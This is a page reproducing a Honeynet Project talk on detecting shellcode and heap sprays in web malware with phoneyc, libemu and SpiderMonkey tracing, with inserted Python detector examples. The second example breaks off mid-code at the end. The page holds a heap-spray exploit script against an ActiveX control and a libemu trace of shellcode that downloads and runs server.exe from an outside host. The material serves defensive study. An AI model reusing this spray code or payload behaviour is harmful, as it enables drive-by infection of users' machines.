phoneyc with libemu
Shellcode and heapspray detection in phoneyc

Zhijie Chen
Honeynet Project Chinese Chapter

Honeynet Project on Google Summer of Code, 2009
Contents

1 Introduction to phoneyc
2 A Typical Web-Based Malware
3 Shellcode detection using Libemu
4 Tracing Mozilla Spidermonkey
  Basic Principles of Spidermonkey
5 Shellcode Detection in phoneyc
  Basic Idea
  Details
  Related Source files
  Implementation
6 Heapspray Detection
7 Current Results
Introduction to phoneyc

http://code.google.com/p/phoneyc/

- A python honeyclient
- Originally written by Jose Nazario.
- To detect Web-based Malware
A Typical Heapspray Mal-javascript

    <body>
    <script>window.onerror=function(){return true;}</script>
    <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"
      style='display:none' id='target'></object>
    <SCRIPT language="javascript">
    var shellcode = unescape("%u9090"+"%u9090"+
      ...(shellcode)
      "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
    </script>
    <SCRIPT language="javascript">
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
      block = block+block+fillblock;
    memory = new Array();
    for (x=0; x<100; x++) memory[x] = block +shellcode;
    var buffer = '';
    while (buffer.length < 1024) buffer+="\x05";
    var ok="1111";
    target.Register(ok,buffer);
    </script>
    </body>
Heap Status After Heapspray

    | More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |
Detecting Shellcode/Heapspray

SC/HS Detecting Tool: How To Detect It?
Introduction to libemu

From its official site:

  libemu is a small library written in c offering basic x86 emulation and shellcode detection using GetPC heuristics. Using libemu one can:
  - detect shellcodes
  - execute the shellcodes
  - profile shellcode behaviour

Using libemu to detect shellcode and heapspray in web-based malware: "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks".
Detecting x86 Instructions

SC/HS Detecting Time: When To Detect It?
Introduction to spidermonkey

What is SpiderMonkey?

  SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
Basic Principles of Spidermonkey

- All the javascript sources are compiled into js bytecodes.
- There is an interpreter that interprets the bytecodes and performs certain simple actions.
- All the javascript variables are stored as jsval.
- Some of the values are stored as an "atom", such as strings.
Basic Idea

As both the shellcode manipulation and the spraying of the fillblock involve assignments, the shellcode will be detected immediately on its assignment if we are able to interrupt spidermonkey at the interpretation of certain bytecodes related to an assignment and check their arguments and values for shellcodes.
Details I

The following js code:

    function a(){b="c"; var a = 0;}

is compiled into bytecodes like:

    00000:   bindname "b"
    00003:   string "c"
    00006:   setname "b"
    00009:   pop
    00010:   zero
    00011:   setvar 0
    00014:   pop
    00015:   stop

So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcodes won't get past!
Details

To do so, we need to:

- Step trace the spidermonkey runtime.
- Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) of all kinds of assignments. Unfortunately, different assignments have different bytecodes accordingly. But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).
Related Source files to be used later

- jsapi.h: Basic APIs for javascript execution.
- jsdbgapi.h: Basic APIs for debugging spidermonkey.
- jsopcode.tbl: All the js opcodes (bytecodes).
- jsinterp.c: You can find how each bytecode is interpreted here.
Implementation

- Register a trace handler into spidermonkey using JS_SetInterrupt. This handler will be called at each step of the bytecode execution.
- In the handler:
  - Use JS_GetTrapOpcode to get the current opcode (bytecode).
  - Use JS_FrameIterator to get the current runtime stack.
  - Check the rvalue of the set* bytecodes on the top of the stack with libemu.
  - Dump the shellcodes and alert.
  - Continue the execution.
- Provide this traced JS virtual machine as a python module named honeyjs, so other parts of phoneyc can use this module just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
Basic Idea

Heapspray
- A myriad of NOP-like x86 instructions
- Accumulating through a loop of assignments
- Shellcode in the end of each sledge

Detection
- Now: A variable counter to record the mal-assignments (assignments containing shellcode in the r-value).
- In the future: entropy? the nozzle way?
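The following Python script is an added example, not honeyjs or SpiderMonkey code, that models both the tracing scheme of the Details and Implementation slides and the mal-assignment counter described under Detection. A toy stack interpreter runs a bytecode listing of the same shape as the slides' (bindname/string/setname/pop/zero/setvar/stop) and calls an interrupt handler before every bytecode, the way a JS_SetInterrupt callback would; the handler acts only on opcodes whose description carries JOF_SET, looks at the r-value on top of the stack, decodes it to the UTF-16 bytes a JS string occupies in the heap, and counts the assignments that look like shellcode. Everything beyond the opcode names is an assumption of the example: the numeric JOF_SET value, the `suspicious` check (a crude stand-in for libemu that only knows a NOP-dominated sled and the 5-byte `call $+5` stub), the 20-assignment heapspray threshold, the `Detector`, `TracedInterpreter`, `spray_program` and `scan` helpers, and the constructed payload strings.

```python
import re

# Flag bit shared by every assignment opcode in SpiderMonkey's opcode table
# (jsopcode.h). The numeric value here is an assumption chosen for the toy.
JOF_SET = 0x20

# Opcode descriptions for the handful of bytecodes the sample programs use:
# name -> flags. Names follow the slides; flags are only what the toy needs.
OPCODES = {
    "bindname": 0, "string": 0, "zero": 0, "getname": 0, "add": 0, "pop": 0, "stop": 0,
    "setname": JOF_SET, "setvar": JOF_SET, "setprop": JOF_SET, "setarg": JOF_SET,
}


def js_unescape(s):
    """Mimic JavaScript unescape() for %uXXXX sequences: each becomes one UTF-16 code unit."""
    return re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)


def heap_bytes(s):
    """The bytes a JS string occupies in the browser heap (UTF-16 little-endian)."""
    return s.encode("utf-16-le", "surrogatepass")


def suspicious(buf):
    """Crude stand-in for the libemu check (assumption): a NOP-dominated buffer
    of sled size, or the 5-byte `call $+5` (E8 00 00 00 00) GetPC stub."""
    sled = len(buf) >= 64 and buf.count(0x90) / len(buf) >= 0.5
    return sled or b"\xE8\x00\x00\x00\x00" in buf


class Detector:
    """Interrupt handler in the spirit of honeyjs: inspects the r-value on top of
    the stack whenever the opcode about to run carries JOF_SET, counts the
    mal-assignments, and escalates to a heapspray verdict past a threshold."""

    def __init__(self, spray_threshold=20):
        self.hits, self.alerts, self.spray_threshold = 0, [], spray_threshold

    def on_interrupt(self, pc, op, stack):
        if not (OPCODES[op] & JOF_SET):
            return
        rvalue = stack[-1]            # set* reads its r-value from the top of the stack
        if not isinstance(rvalue, str):
            return
        buf = heap_bytes(rvalue)
        if suspicious(buf):
            self.hits += 1
            self.alerts.append((pc, op, len(buf)))

    def verdict(self):
        if self.hits >= self.spray_threshold:
            return "heapspray"
        return "shellcode" if self.hits else "clean"


class TracedInterpreter:
    """Toy stack machine over (opcode, operand) tuples. The handler is invoked
    before every bytecode, as a JS_SetInterrupt callback would be."""

    def __init__(self, handler):
        self.stack, self.vars, self.handler = [], {}, handler

    def run(self, program):
        for pc, (op, arg) in enumerate(program):
            self.handler(pc, op, self.stack)
            if op == "string":
                self.stack.append(arg)
            elif op == "zero":
                self.stack.append(0)
            elif op == "getname":
                self.stack.append(self.vars[arg])
            elif op == "add":
                rhs, lhs = self.stack.pop(), self.stack.pop()
                self.stack.append(lhs + rhs)
            elif OPCODES[op] & JOF_SET:
                self.vars[arg] = self.stack[-1]   # assignment is an expression: value stays
            elif op == "pop":
                self.stack.pop()
            elif op == "stop":
                break
            # bindname: name resolution only, nothing to do in the toy


# Constructed programs. The benign one is the slide's `b="c"; var a=0;`.
BENIGN = [("bindname", "b"), ("string", "c"), ("setname", "b"), ("pop", None),
          ("zero", None), ("setvar", 0), ("pop", None), ("stop", None)]


def spray_program(n_blocks):
    """Bytecode shape of the slide's heapspray: a payload, a sled, then
    memory[x] = block + shellcode in a loop. The payload is a constructed stub."""
    shellcode = js_unescape("%u9090%u9090%u00e8%u0000%u5b00")   # 4 NOPs + call $+5 ; pop ebx
    block = js_unescape("%u9090" * 64)                           # 128-byte NOP sled
    prog = [("string", shellcode), ("setname", "shellcode"), ("pop", None),
            ("string", block), ("setname", "block"), ("pop", None)]
    for x in range(n_blocks):
        prog += [("getname", "block"), ("getname", "shellcode"), ("add", None),
                 ("setprop", "memory[%d]" % x), ("pop", None)]
    return prog + [("stop", None)]


def scan(program, spray_threshold=20):
    """Run a program under the traced interpreter and return (hits, verdict)."""
    det = Detector(spray_threshold)
    TracedInterpreter(det.on_interrupt).run(program)
    return det.hits, det.verdict()


if __name__ == "__main__":
    print("benign:", scan(BENIGN))
    print("spray :", scan(spray_program(100)))
```

Running the spray program with 100 blocks yields 102 hits (the shellcode assignment, the sled assignment, and one per `memory[x]`), which mirrors the "HIT: 1" versus "HIT: 100" split in the phoneyc run later in the deck; a handful of hits stays a plain shellcode alert, and the benign program never triggers because the handler ignores every opcode without JOF_SET and every non-string r-value.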
A Run on ssreader_0day.html

    joyan@Jdeb:~/code/phoneyc$ sh go.sh
    HONEYCLIENT MODULE TEST
    fetching http://172.31.25.227/phoneyc/ssreader_0day.html
    []
    ==> http://172.31.25.227/phoneyc/ssreader_0day.html
    JS EVAL
    Executing Javascript:
    DEBUG: !!!SC DETECTED at 141847268=141847572size:374
    DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    ...
    DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
    SSReader Pdg2 Register method overflow
    [ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
    Runing shellcode... offset:248
    DEBUG: Begin analyzing ...
    DEBUG: download http://1v1.name/server.exe -> c:\WINDOWS\system32\a.exe
    ...
    URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
    Done
    [ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
    [ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
    VBS EVAL IFRAMES []
    HREFS []
    FRAMES []
    IMAGES []
Analysis of The Shellcode using libemu

    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
             none;
         LPCSTR lpProcName = 0x0041710c =>
             = "GetSystemDirectoryA";
    ) = 0x7c814eea;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
             none;
         LPCSTR lpProcName = 0x00417120 =>
             = "WinExec";
    ) = 0x7c86136d;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
             none;
         LPCSTR lpProcName = 0x00417128 =>
             = "ExitThread";
    ) = 0x7c80c058;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7c800000 =>
             none;
         LPCSTR lpProcName = 0x00417133 =>
             = "LoadLibraryA";
    ) = 0x7c801d77;
    HMODULE LoadLibraryA (
         LPCTSTR lpFileName = 0x00417140 =>
             = "urlmon";
    ) = 0x7df20000;
    FARPROC WINAPI GetProcAddress (
         HMODULE hModule = 0x7df20000 =>
             none;
         LPCSTR lpProcName = 0x00417147 =>
             = "URLDownloadToFileA";
    ) = 0x7df7b0bb;
    UINT GetSystemDirectory (
         LPTSTR lpBuffer = 0x0012fe5f =>
             none;
         UINT uSize = 32;
    ) = 19;
    HRESULT URLDownloadToFile (
         LPUNKNOWN pCaller = 0x00000000 =>
             none;
         LPCTSTR szURL = 0x0041715a =>
             = "http://1v1.name/server.exe";
         LPCTSTR szFileName = 0x0012fe5f =>
             = "c:\WINDOWS\system32\a.exe";
         DWORD dwReserved = 0;
         LPBINDSTATUSCALLBACK lpfnCB = 0;
    ) = 0;
    UINT WINAPI WinExec (
         LPCSTR lpCmdLine = 0x0012fe58 =>
             = "cmd /c c:\WINDOWS\system32\a.exe";
         UINT uCmdShow = 0;
    ) = 32;
Thank you!

Fuzzing | Null OWASP Mumbai | 2016 June
 
Advanced exploit development
Advanced exploit developmentAdvanced exploit development
Advanced exploit development
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
 
CNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: ShellcodeCNIT 127 Ch 3: Shellcode
CNIT 127 Ch 3: Shellcode
 

Similaire à Shellcode and heapspray detection in phoneyc

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksAditya K Sood
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationYury Chemerkin
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 

Similaire à Shellcode and heapspray detection in phoneyc (6)

Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.
 
Toorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit PacksToorcon Seattle 2011 - Browser Exploit Packs
Toorcon Seattle 2011 - Browser Exploit Packs
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Dmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentationDmitriy evdokimov. light and dark side of code instrumentation
Dmitriy evdokimov. light and dark side of code instrumentation
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 

Dernier

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 

Dernier (20)

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 

Shellcode and heapspray detection in phoneyc

  • 1. phoneyc with libemu: Shellcode and heapspray detection in phoneyc. Zhijie Chen, Honeynet Project Chinese Chapter. Honeynet Project on Google Summer of Code, 2009.
  • 2. Contents: 1 Introduction to phoneyc; 2 A Typical Web-Based Malware; 3 Shellcode detection using Libemu; 4 Tracing Mozilla Spidermonkey (Basic Principles of Spidermonkey); 5 Shellcode Detection in phoneyc (Basic Idea, Details, Related Source files, Implementation); 6 Heapspray Detection; 7 Current Results.
  • 4. Introduction to phoneyc (http://code.google.com/p/phoneyc/): a python honeyclient, originally written by Jose Nazario, to detect Web-based Malware.
  • 6. A Typical Heapspray Mal-javascript I
    <body>
    <script>window.onerror=function(){return true;}</script>
    <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
    <SCRIPT language="javascript">
    var shellcode = unescape("%u9090"+"%u9090"+
    ...(shellcode)
    "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
    </script>
    <SCRIPT language="javascript">
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
        block = block+block+fillblock;
  • 7. A Typical Heapspray Mal-javascript II
    memory = new Array();
    for (x=0; x<100; x++) memory[x] = block +shellcode;
    var buffer = '';
    while (buffer.length < 1024) buffer+="\x05";
    var ok="1111";
    target.Register(ok,buffer);
    </script>
    </body>
  • 8. Heap Status After Heapspray: | More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge | Shellcode |
  • 9. Detecting Shellcode/Heapspray. SC/HS Detecting Tool: How To Detect It?
  • 11. Introduction to libemu. From its official site: libemu is a small library written in c offering basic x86 emulation and shellcode detection using GetPC heuristics. Using libemu one can: detect shellcodes; execute the shellcodes; profile shellcode behaviour. Using libemu to detect shellcode and heapspray in web-based malware (cf. "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks").
  • 12. Detecting x86 Instructions. SC/HS Detecting Time: When To Detect It?
  • 14. Introduction to spidermonkey. What is SpiderMonkey? SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript (http://www.mozilla.org/js/spidermonkey/).
  • 15. Basic Principles of Spidermonkey: All the javascript sources are compiled into js bytecodes. There is an interpreter which interprets the bytecodes and does certain simple actions. All the javascript variables are stored as jsval. Some of the values are stored as an "atom", such as strings.
  • 17. Basic Idea. As both the shellcode manipulation and the spraying of the fillblock involve assignments, the shellcode will be detected immediately on its assignment if we are able to interrupt spidermonkey at the interpretation of certain bytecodes related to an assignment and check its arguments and values for shellcodes.
  • 18. Details I. The following js code:
    function a(){b="c"; var a = 0;}
  is compiled into bytecodes like:
    00000: bindname "b"
    00003: string "c"
    00006: setname "b"
    00009: pop
    00010: zero
    00011: setvar 0
    00014: pop
    00015: stop
  So, if we examine the set* opcodes' arguments on the top of the stack at runtime, shellcodes won't get past!
  • 19. Details. To do so, we need to: Step trace the spidermonkey runtime. Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) on all kinds of assignments. Unfortunately different assignments have different bytecodes accordingly, but all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h).
  • 20. Related Source files to be used later: jsapi.h: Basic APIs for javascript execution. jsdbgapi.h: Basic APIs for debugging spidermonkey. jsopcode.tbl: All the js opcodes (bytecodes). jsinterp.c: You can find how each bytecode is interpreted here.
  • 21. Implementation. Register a trace handler into spidermonkey using JS_SetInterrupt; this handler will be called at each step of the bytecode execution. In the handler: Use JS_GetTrapOpcode to get the current opcode (bytecode). Use JS_FrameIterator to get the current runtime stack. Check the rvalue of the set* bytecodes on the top of the stack with libemu. Dump the shellcodes and alert. Continue the execution. Provide this traced js virtual machine as a python module named honeyjs, so other parts of phoneyc can use this module just the same as python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
  • 23. Basic Idea. Heapspray: A myriad of NOP-like x86 instructions, accumulating through a loop of assignments, with shellcode at the end of each sledge.
  • 24. Basic Idea. Heapspray: A myriad of NOP-like x86 instructions, accumulating through a loop of assignments, with shellcode at the end of each sledge. Detection: Now: a variable counter to record the mal-assignments (assignments containing shellcode in the r-value). In the future: entropy? the nozzle way?
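The set*-opcode trace of slides 17 to 21 and the mal-assignment counter of slides 23 to 24, replayed in Python as an added example (not phoneyc's, SpiderMonkey's or libemu's own code): the JS_SetInterrupt hook is modelled by feeding constructed (opcode, lvalue, rvalue) events to a tracer, libemu's GetPC heuristics by a two-pattern byte check, and the elided shellcode by a constructed GetPC stub followed by the page's own URL tail. SET_OPCODES (setelem added), the HEAPSPRAY_HITS threshold and the name emu_shellcode_test are assumptions not taken from the page.

```python
"""Replay of phoneyc's set*-opcode tracing and heapspray counting (example
code written for this page, not phoneyc's, SpiderMonkey's or libemu's)."""
import re
from collections import Counter

# Opcodes whose jsopcode.h description carries the JOF_SET bit.  The page
# names the first four; setelem (what `memory[x] = ...` compiles to) is an
# assumption added here.
SET_OPCODES = {"setname", "setvar", "setprop", "setarg", "setelem"}

_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(s: str) -> str:
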